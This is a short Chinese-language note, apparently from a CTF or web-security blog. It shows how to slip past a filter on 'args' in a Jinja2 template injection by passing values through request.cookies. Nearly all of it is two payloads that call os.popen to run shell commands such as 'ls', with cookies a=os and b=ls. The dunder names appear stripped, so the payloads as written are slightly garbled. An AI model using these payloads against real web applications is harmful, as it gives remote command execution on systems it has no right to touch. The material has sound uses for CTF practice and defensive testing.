当args也被禁用
可以用cookie传值request.cookies.a绕过
比如payload为
?name={{ config.class.init.globals[‘os’].popen (‘ls’).read() }}
利用request.cookies.a绕过
payload为
?name={{ config.class.init.globals[request.cookies.a].popen (request.cookies.b).read() }}
Cookie: a=os, b=ls
若有收获,就点个赞吧
0 人点赞
